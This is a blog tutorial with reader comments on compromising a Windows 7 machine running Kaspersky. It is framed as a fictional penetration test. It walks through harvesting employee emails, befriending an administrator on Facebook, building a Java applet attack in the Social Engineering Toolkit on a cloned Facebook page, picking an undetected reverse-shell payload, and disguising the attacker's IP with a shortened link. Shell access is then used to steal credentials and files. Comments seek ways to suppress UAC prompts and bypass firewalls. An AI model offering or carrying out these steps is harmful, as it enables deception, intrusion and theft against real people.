Pin It

How To Hack Windows 7 And Bypass Firewall And Kaspersky Antivirus




Ever tried to hack a windows 7?, Ever tired of bypassing antiviurs?, Then this is the tutorial for you.Ok, so you want to know how to attack a fully secured and protected windows 7 sp1 x64 with all security defenses working and running ( UAC,DEP,ASLR,EMET,etc.)





Not just that but also there is Kaspersky internet security 2012 activated and updated till this moment and running with default options like (firewall, application control, proactive defense, etc.)



As we know that windows 7 sp1 doesn’t have any remote exploits like (ms08-067) for xp and (MS09-050) for vista/ Because windows 7 is more secured and exploitation (exploit development) is very hard (good job Microsoft). Most internet users have Firefox, chrome and internet explorer not all of them but one for two of them (I am using all of them at once J )


And they have flash player from adobe and java from oracle so they watch online clips/movies from YouTube and enjoy online games and applications that requires java and flash payer. Most of them have anti-virus with firewall enabled by default, they use
( eset,avira,avast,Kaspersky,bitdefender,etc.)

Let’s take a look at the best anti-virus in the world "Real World" Protection Test - chart updated!

And download


We can see that Kaspersky internet security 2012 and bit defender are the best



But Kaspersky is the best one from my point of view J
Let’s imagine this scenario:
I am working as a penetration tester in a big security company; they asked me to conduct a penetration testing (client side/social engineering) no web penetration testing, network/wireless penetration testing just client side for a big customer

I said ok let’s do it.

We finished all paper work and other legal stuff then I am thinking now how I can penetrate this company???
My big company told me that the big customer web site URL is (http://www.bigx.com)
I made a quick search using Google


Then I used another tool called (the harvester), you can find it in backtrack 5 r2 or download it from http://www.edge-security.com/theHarvester.php
 I found many emails:

That is good, now I have a starting point to target and attack all emails I found
Now I know that this is a big customer and a big company so they must use a big security as well
And they have anti-virus and modern and secured operating systems like (windows 7 sp1)
So public exploits against IE,Firefox,flash,adobe and other local programs will not work and I will got detected using Anti-virus that will detect my exploits that I will send to my targets and remove it
So the best chance I have is to use an evil java applet to trick the victim to open it
But the victim must have java installed on his system
Ok this is good as many internet users have java installed including me J




Ok, time to hunt them all ….
I searched in pipl.com


I entered all emails I have and found many interesting information like:




Note: this is FAKE I cannot disclose sensitive information about the big Company J

As you can see ( name,age,location,genere) and also Facebook account

I added this admin@bigx.com as a friend in Facebook and we are now friends

I chatted with him about his company and some general talk

After some time we have a small trust with each other (I can send him images or links)

Now I will start my backtrack 5 r2 machine and run this cool program

(Social engineering toolkit) AKA (SET)



Now time to attack my target


I will create an evil java applet
I will choose
2) Website Attack Vectors
Then
 1) Java Applet Attack Method


After that
1)      Web Templates


And then
4. Facebook






Now the most important part, we must use a payload that is not detected by any security products like ( AV,IPS)

I know that my victim is using Kaspersky internet security 2012 and windows 7 sp1, I asked him in our facebook chat “what is the best anti-virus you recommended?”

He replied “Oh, the best one is Kaspersky internet security 2012, we are using it in our company and I personally use it installed on windows 7”

I tried in my penetration testing lab many of payloads and most of them detected by Kaspersky L
But the payload number 11

  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET


Is working like charm and no AV detects it J

Then I choose it and choose port 443 to b my local port that payload will connect to me


Note:  I opened two ports in my router ( 443,80) , so the victim can connect to me when payload is successfully executed

Now we are good and ready


Now we must send our external ip to victim, we can use this website

Getip.com

And you will find your external ip like this


And we can hide our external ip by using bit.ly website to shorten and conceal it


You can see that my external ip is hidden now!


Now I can send him this link and when he click on it he will see facebook.com loaded with your java applet exploit. Note that Kaspersky is running

And he will click run (he is secured and don’t fear from anything  J )

Now he clicked run and I can see



Kaspersky is running and java is running and everything is secure J

But I have a remote shell on my target machine

Now I can do many things like:


Just press 1 to start interacting with the opened session

And then type help to view all supported commands

I always like a pure windows command shell

I will type “shell “


And I will type “tasklist” to view all running process and services


Then


OMG “Kaspersky is running :)”

This is time to view files and download /upload and do some Real World Windows Post exploitation
And we owned our victim and found many sensitive Bigx.com files like usernames and passwords and some private docs and photos J and found filezilla ftp username and passwords and connect with those ftp credentials and you know the rest …… 

“Man , WE Defeated Them all !!”

Now it is time to write a nice report

I hope you enjoyed this (FAKE) Real World scenario

About The Author

Mohamed Ramadan is a security researcher from Egypt. He is interested in Penetration Testing, Malware Reverse Engineering, Securing Websites and Servers and Forensics.He also teaches Penetration Testing at Ninja-Sec.com.

Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .

At RHA Infosec we provide different types of Security Testing from small business sites to Corporate Sites. Click Here to know more about our complete list of services.

Subscribe to RHA


Enjoyed this article?
Subscribe to "Rafay Hacking Articles" and get daily updates in your inbox for free!


Tags:


Kindly Bookmark it and Share it with Friends:

20 comments :

Ankit on April 17, 2012 at 2:14 PM said...

That was really "AWESOME"

Anonymous said...

i'm using backtrack 5. Can it use as well?

Ankit Jangra on April 17, 2012 at 6:40 PM said...

best post ever....

M.Gazzaly on April 18, 2012 at 12:42 AM said...

Wow!! Nice one !! really i expect this one ;)
after very longtime nice one to read in RHA


Regards
M.Gazzaly
(http://www.gazzaly.info)

Anonymous said...

Nice post... i really like it :)

Anonymous said...

please help!! When i choose option 2 "Website Attack Vectors" it gives me following error.
" Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu."

Anonymous said...

How to open port in router???

Rafay Baloch on April 18, 2012 at 11:42 PM said...

@Anonymous

Try this:

1. Go to cd /pentest/exploits/set/config
2. gedit set_config
3. search for something like metasploit path:
4. Replace it with /opt/metasploit/msf3

mohaab on April 19, 2012 at 12:52 AM said...

just click on this link to learn how to open ports in your router

http://bit.ly/IPK6Me

regards

Karan on April 19, 2012 at 5:47 AM said...

hello rafay bro can u write article about opening port of router.
please

Hacking on April 19, 2012 at 9:34 AM said...

good mr.mohaab

thanks :)

my BaDer

Hacking on April 19, 2012 at 9:35 AM said...

good mr.mohaab

thanks :)

my BaDer

Anonymous said...

tells me that " Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu."
Im doing exactly what you say
1. Go to cd /pentest/exploits/set/config
2. gedit set_config
3. search for something like metasploit path: this one wherei must search it ??? plz help me
4. Replace it with /opt/metasploit/msf3

Black Cloud Hackers on July 6, 2012 at 11:48 AM said...

Our group would like to ask the fellow commentors to join us here::::
blackcloudhackers@gmail.com

Anonymous said...

HI Rafay

Thanks for sharing this wonderful tutorial
I was able to do the test on Windows 7 box in my lab environment
however when i typed regedit from "shell" , user ( me) has been asked if he wanted to open the application ( UAC), my question:
How to defeat UAC ? as victim should not suspect anything .

With regards

PointCom

akki on September 26, 2012 at 12:30 AM said...

I am using nmap software for detecting open ports. Before I installed avast internet security it was working perfectly fine but now it can't scan any open ports. Kindly help me how to bypass nmap through my windows firewall and avast firewall.

Anonymous said...

Does this hack still work?

Anonymous said...

You call this hacking ?

Shashank Bhattarai on January 5, 2013 at 3:17 AM said...

I want to connect to remote computer through wifi without touching other computer...can you help me with it???

Sidhant Bansal on February 19, 2013 at 5:52 AM said...

Thanks...a lot man.It helped me a lot .

Dare to ask? :)

Blog Archive

 

Recent Comments

About

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.